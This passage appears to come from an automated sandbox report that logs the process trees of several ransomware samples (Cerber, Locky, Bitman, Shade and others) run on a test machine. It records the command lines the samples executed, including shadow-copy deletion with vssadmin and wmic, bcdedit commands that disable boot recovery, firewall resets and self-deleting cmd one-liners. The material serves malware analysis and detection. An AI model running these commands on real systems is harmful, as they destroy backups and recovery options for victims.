        • C:\Users\Admin\Desktop\00293\HEUR-Trojan-Ransom.Win32.Generic-ebd9edcbf71348acc608f0e7f5dfab086dcc95f5f7258cf28f6e785d071c5cd2.exe
          HEUR-Trojan-Ransom.Win32.Generic-ebd9edcbf71348acc608f0e7f5dfab086dcc95f5f7258cf28f6e785d071c5cd2.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          PID:1172
          • C:\Users\Admin\Desktop\00293\HEUR-Trojan-Ransom.Win32.Generic-ebd9edcbf71348acc608f0e7f5dfab086dcc95f5f7258cf28f6e785d071c5cd2.exe
            HEUR-Trojan-Ransom.Win32.Generic-ebd9edcbf71348acc608f0e7f5dfab086dcc95f5f7258cf28f6e785d071c5cd2.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2084
            • C:\Users\Admin\AppData\Roaming\Bibo\xuohe.exe
              "C:\Users\Admin\AppData\Roaming\Bibo\xuohe.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              PID:1140
              • C:\Users\Admin\AppData\Roaming\Bibo\xuohe.exe
                "C:\Users\Admin\AppData\Roaming\Bibo\xuohe.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:1748
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_4c8a34f7.bat"
              5⤵
                PID:2044
          • C:\Users\Admin\Desktop\00293\HEUR-Trojan-Ransom.Win32.Zerber.pef-609c0e844fa0aa61014612c3b603bf8eb45c02858615df7b385e21b17ef779ab.exe
            HEUR-Trojan-Ransom.Win32.Zerber.pef-609c0e844fa0aa61014612c3b603bf8eb45c02858615df7b385e21b17ef779ab.exe
            3⤵
            • Cerber
            • Drops startup file
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Sets desktop wallpaper using registry
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:1484
            • C:\Windows\SysWOW64\netsh.exe
              C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
              4⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2556
            • C:\Windows\SysWOW64\netsh.exe
              C:\Windows\system32\netsh.exe advfirewall reset
              4⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1488
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___EN7EL_.hta"
              4⤵
              • Blocklisted process makes network request
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              PID:2708
            • C:\Windows\SysWOW64\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___9AJHW_.txt
              4⤵
              • System Location Discovery: System Language Discovery
              • Opens file in notepad (likely ransom note)
              PID:1928
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe"
              4⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1820
              • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:1792
                • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                  "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                  6⤵
                  • Cerber
                  • Adds policy Run key to start application
                  • Drops startup file
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Adds Run key to start application
                  • Checks whether UAC is enabled
                  • Sets desktop wallpaper using registry
                  • System Location Discovery: System Language Discovery
                  • Modifies Control Panel
                  PID:2016
                  • C:\Windows\system32\vssadmin.exe
                    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                    7⤵
                    • Interacts with shadow copies
                    PID:1284
                  • C:\Windows\system32\wbem\wmic.exe
                    "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                    7⤵
                      PID:2176
                    • C:\Windows\System32\bcdedit.exe
                      "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2020
                    • C:\Windows\System32\bcdedit.exe
                      "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2892
                    • C:\Windows\system32\NOTEPAD.EXE
                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
                      7⤵
                        PID:1496
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs"
                        7⤵
                          PID:3232
                        • C:\Windows\system32\cmd.exe
                          /d /c taskkill /t /f /im "fsutil.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe" > NUL
                          7⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          PID:4828
                          • C:\Windows\system32\taskkill.exe
                            taskkill /t /f /im "fsutil.exe"
                            8⤵
                            • Kills process with taskkill
                            PID:5040
                          • C:\Windows\system32\PING.EXE
                            ping -n 1 127.0.0.1
                            8⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:4496
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im "HEUR-Trojan-Ransom.Win32.Zerber.pef-609c0e844fa0aa61014612c3b603bf8eb45c02858615df7b385e21b17ef779ab.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      PID:2052
                • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Agent.iqk-af3ca029c7f8abafef86c5af9c24aa3ddd9056a9609f217d9c536de134a115ce.exe
                  Trojan-Ransom.Win32.Agent.iqk-af3ca029c7f8abafef86c5af9c24aa3ddd9056a9609f217d9c536de134a115ce.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:2028
                • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Aura.ls-b6cd95f9ba61eca8407a44ed85c7a2a5e813d567bae778b1ec627c01503f2b6c.exe
                  Trojan-Ransom.Win32.Aura.ls-b6cd95f9ba61eca8407a44ed85c7a2a5e813d567bae778b1ec627c01503f2b6c.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious use of SetWindowsHookEx
                  PID:2688
                  • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Aura.ls-b6cd95f9ba61eca8407a44ed85c7a2a5e813d567bae778b1ec627c01503f2b6c.exe
                    "C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Aura.ls-b6cd95f9ba61eca8407a44ed85c7a2a5e813d567bae778b1ec627c01503f2b6c.exe"
                    4⤵
                    • Drops startup file
                    • Executes dropped EXE
                    PID:1268
                • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Bitman.atz-00e204312ab9b53bf50dc34b79b3108fe7d9a6b871358f5eeefaa5322f8ba288.exe
                  Trojan-Ransom.Win32.Bitman.atz-00e204312ab9b53bf50dc34b79b3108fe7d9a6b871358f5eeefaa5322f8ba288.exe
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1988
                  • C:\Users\Admin\AppData\Roaming\utgneacroic.exe
                    C:\Users\Admin\AppData\Roaming\utgneacroic.exe
                    4⤵
                    • Drops startup file
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops file in Program Files directory
                    • Modifies system certificate store
                    • Suspicious behavior: RenamesItself
                    • Suspicious use of AdjustPrivilegeToken
                    • System policy modification
                    PID:2676
                    • C:\Windows\System32\vssadmin.exe
                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                      5⤵
                      • Interacts with shadow copies
                      PID:2372
                    • C:\Windows\SysWOW64\NOTEPAD.EXE
                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Howto_Restore_FILES.TXT
                      5⤵
                      • Opens file in notepad (likely ransom note)
                      • Suspicious use of FindShellTrayWindow
                      PID:2720
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\Howto_Restore_FILES.HTM
                      5⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:2828
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2828 CREDAT:275457 /prefetch:2
                        6⤵
                        • System Location Discovery: System Language Discovery
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2956
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\AppData\Roaming\UTGNEA~1.EXE
                      5⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2380
                      • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                        "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:2724
                        • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                          "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:1700
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00293\TROJAN~3.EXE
                    4⤵
                      PID:2960
                  • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Bitman.jzf-6dfcf5d5a1b25faa513f83df82b6521a6da4a55cb78fa15bdf370afb71d95e3d.exe
                    Trojan-Ransom.Win32.Bitman.jzf-6dfcf5d5a1b25faa513f83df82b6521a6da4a55cb78fa15bdf370afb71d95e3d.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of SetWindowsHookEx
                    PID:2088
                    • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Bitman.jzf-6dfcf5d5a1b25faa513f83df82b6521a6da4a55cb78fa15bdf370afb71d95e3d.exe
                      Trojan-Ransom.Win32.Bitman.jzf-6dfcf5d5a1b25faa513f83df82b6521a6da4a55cb78fa15bdf370afb71d95e3d.exe
                      4⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2024
                      • C:\Windows\dhsbynyrrvyt.exe
                        C:\Windows\dhsbynyrrvyt.exe
                        5⤵
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:2560
                        • C:\Windows\dhsbynyrrvyt.exe
                          C:\Windows\dhsbynyrrvyt.exe
                          6⤵
                          • Drops startup file
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          PID:1892
                          • C:\Windows\System32\wbem\WMIC.exe
                            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                            7⤵
                              PID:216
                            • C:\Windows\SysWOW64\NOTEPAD.EXE
                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                              7⤵
                              • System Location Discovery: System Language Discovery
                              • Opens file in notepad (likely ransom note)
                              PID:3048
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\DHSBYN~1.EXE
                              7⤵
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:3984
                              • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                8⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:4052
                                • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                  "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  PID:3156
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00293\TROJAN~4.EXE
                          5⤵
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:2752
                          • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                            "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:912
                            • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                              "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                              7⤵
                              • Cerber
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:2196
                              • C:\Windows\system32\vssadmin.exe
                                "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                8⤵
                                • Interacts with shadow copies
                                PID:732
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                8⤵
                                  PID:1676
                                • C:\Windows\System32\bcdedit.exe
                                  "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                  8⤵
                                  • Modifies boot configuration data using bcdedit
                                  PID:896
                                • C:\Windows\System32\bcdedit.exe
                                  "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                  8⤵
                                  • Modifies boot configuration data using bcdedit
                                  PID:2864
                      • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Bitman.qrz-7a2a1df0de0291c1ba1227aa611cffe7ac6667bc67fe74c71120393b26a89a36.exe
                        Trojan-Ransom.Win32.Bitman.qrz-7a2a1df0de0291c1ba1227aa611cffe7ac6667bc67fe74c71120393b26a89a36.exe
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:1060
                        • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Bitman.qrz-7a2a1df0de0291c1ba1227aa611cffe7ac6667bc67fe74c71120393b26a89a36.exe
                          Trojan-Ransom.Win32.Bitman.qrz-7a2a1df0de0291c1ba1227aa611cffe7ac6667bc67fe74c71120393b26a89a36.exe
                          4⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:2236
                          • C:\Windows\cycegapxoetm.exe
                            C:\Windows\cycegapxoetm.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:2888
                            • C:\Windows\cycegapxoetm.exe
                              C:\Windows\cycegapxoetm.exe
                              6⤵
                              • Drops startup file
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Drops file in Program Files directory
                              • System Location Discovery: System Language Discovery
                              • System policy modification
                              PID:2152
                              • C:\Windows\System32\wbem\WMIC.exe
                                "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                7⤵
                                  PID:2188
                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  • Opens file in notepad (likely ransom note)
                                  PID:3968
                                • C:\Windows\System32\wbem\WMIC.exe
                                  "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                  7⤵
                                    PID:3436
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\CYCEGA~1.EXE
                                    7⤵
                                    • Loads dropped DLL
                                    PID:1004
                                    • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                      "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2256
                                      • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                        "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                        9⤵
                                        • Executes dropped EXE
                                        PID:3116
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00293\TRC39D~1.EXE
                                5⤵
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                PID:2288
                                • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                  "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1292
                                  • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                    "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2332
                          • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Foreign.nnev-b7f7c897665b57450a17537d96012e6248889ddb173b0ca183f52d26a5dcd227.exe
                            Trojan-Ransom.Win32.Foreign.nnev-b7f7c897665b57450a17537d96012e6248889ddb173b0ca183f52d26a5dcd227.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:2068
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Foreign.nnev-b7f7c897665b57450a17537d96012e6248889ddb173b0ca183f52d26a5dcd227.exe
                              Trojan-Ransom.Win32.Foreign.nnev-b7f7c897665b57450a17537d96012e6248889ddb173b0ca183f52d26a5dcd227.exe
                              4⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              PID:916
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\F22C\7916.bat" "C:\Users\Admin\AppData\Roaming\MICROS~1\Acprtdll\avrtprxy.exe" "C:\Users\Admin\Desktop\00293\TRDF4A~1.EXE""
                                5⤵
                                • Loads dropped DLL
                                PID:1356
                                • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                  "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1780
                                  • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                    "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                    7⤵
                                    • Cerber
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:1608
                                    • C:\Windows\system32\vssadmin.exe
                                      "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                      8⤵
                                      • Interacts with shadow copies
                                      PID:200
                                    • C:\Windows\system32\wbem\wmic.exe
                                      "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                      8⤵
                                        PID:1724
                                      • C:\Windows\System32\bcdedit.exe
                                        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                        8⤵
                                        • Modifies boot configuration data using bcdedit
                                        PID:1068
                                      • C:\Windows\System32\bcdedit.exe
                                        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                        8⤵
                                        • Modifies boot configuration data using bcdedit
                                        PID:2096
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Locky.bil-c1735a37213eb130d676700e7f0926518a56ab8ff7c25b661f9fa6d0cb2af1a0.exe
                              Trojan-Ransom.Win32.Locky.bil-c1735a37213eb130d676700e7f0926518a56ab8ff7c25b661f9fa6d0cb2af1a0.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:1312
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Locky.vy-d791850983e36e02d31e26ec848e3c1993382fb26ef5a8f46d50b3ed14bdc0b8.exe
                              Trojan-Ransom.Win32.Locky.vy-d791850983e36e02d31e26ec848e3c1993382fb26ef5a8f46d50b3ed14bdc0b8.exe
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:3000
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Locky.xqn-994e4686f30fe88bbf8e88200adad29ed7d87598b7c184eeed648edcd2975f32.exe
                              Trojan-Ransom.Win32.Locky.xqn-994e4686f30fe88bbf8e88200adad29ed7d87598b7c184eeed648edcd2975f32.exe
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2764
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Shade.nra-49a0d3b2a927000e9445828eb23fff95ffdb78a76622d6b0d0c4cbe324f04247.exe
                              Trojan-Ransom.Win32.Shade.nra-49a0d3b2a927000e9445828eb23fff95ffdb78a76622d6b0d0c4cbe324f04247.exe
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2916
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Shade.uv-32f5dc37372e541acb096b5f442cfbf280bb22ec9fe0da502a1a7614747a6392.exe
                              Trojan-Ransom.Win32.Shade.uv-32f5dc37372e541acb096b5f442cfbf280bb22ec9fe0da502a1a7614747a6392.exe
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious use of SetWindowsHookEx
                              PID:1432
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Shade.uv-32f5dc37372e541acb096b5f442cfbf280bb22ec9fe0da502a1a7614747a6392.exe
                                "C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Shade.uv-32f5dc37372e541acb096b5f442cfbf280bb22ec9fe0da502a1a7614747a6392.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:3020
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Shade.vt-0da439a897a1e27033ed6dedf30d8cdda99e689dc85b4c88a53a1b5b3094cb30.exe
                              Trojan-Ransom.Win32.Shade.vt-0da439a897a1e27033ed6dedf30d8cdda99e689dc85b4c88a53a1b5b3094cb30.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious use of SetWindowsHookEx
                              PID:816
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Shade.vt-0da439a897a1e27033ed6dedf30d8cdda99e689dc85b4c88a53a1b5b3094cb30.exe
                                "C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Shade.vt-0da439a897a1e27033ed6dedf30d8cdda99e689dc85b4c88a53a1b5b3094cb30.exe"
                                4⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:2980
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.apeu-2f144ed711fbef254298f03c5a9192c01db3e4be88911e60c23469311e45f982.exe
                              Trojan-Ransom.Win32.Zerber.apeu-2f144ed711fbef254298f03c5a9192c01db3e4be88911e60c23469311e45f982.exe
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious behavior: MapViewOfSection
                              PID:1336
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.apeu-2f144ed711fbef254298f03c5a9192c01db3e4be88911e60c23469311e45f982.exe
                                Trojan-Ransom.Win32.Zerber.apeu-2f144ed711fbef254298f03c5a9192c01db3e4be88911e60c23469311e45f982.exe
                                4⤵
                                • Cerber
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:1612
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.dhg-4f7a4760be8536e635c9acee019fd6ebed07a566c3963a2a480b7424cfe1aabc.exe
                              Trojan-Ransom.Win32.Zerber.dhg-4f7a4760be8536e635c9acee019fd6ebed07a566c3963a2a480b7424cfe1aabc.exe
                              3⤵
                              • Cerber
                              • Adds policy Run key to start application
                              • Drops startup file
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              • Modifies Control Panel
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1324
                              • C:\Windows\SysWOW64\cmd.exe
                                /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dhg-4f7a4760be8536e635c9acee019fd6ebed07a566c3963a2a480b7424cfe1aabc.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.dhg-4f7a4760be8536e635c9acee019fd6ebed07a566c3963a2a480b7424cfe1aabc.exe" > NUL
                                4⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                PID:2340
                              • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\NAPSTAT.EXE
                                "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\NAPSTAT.EXE"
                                4⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:356
                              • C:\Windows\SysWOW64\cmd.exe
                                /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dhg-4f7a4760be8536e635c9acee019fd6ebed07a566c3963a2a480b7424cfe1aabc.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.dhg-4f7a4760be8536e635c9acee019fd6ebed07a566c3963a2a480b7424cfe1aabc.exe" > NUL
                                4⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                PID:2532
                            • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe
                              Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              • Suspicious use of SetWindowsHookEx
                              PID:1896
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe
                                Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe
                                4⤵
                                • Cerber
                                • Adds policy Run key to start application
                                • Drops startup file
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                • System Location Discovery: System Language Discovery
                                • Modifies Control Panel
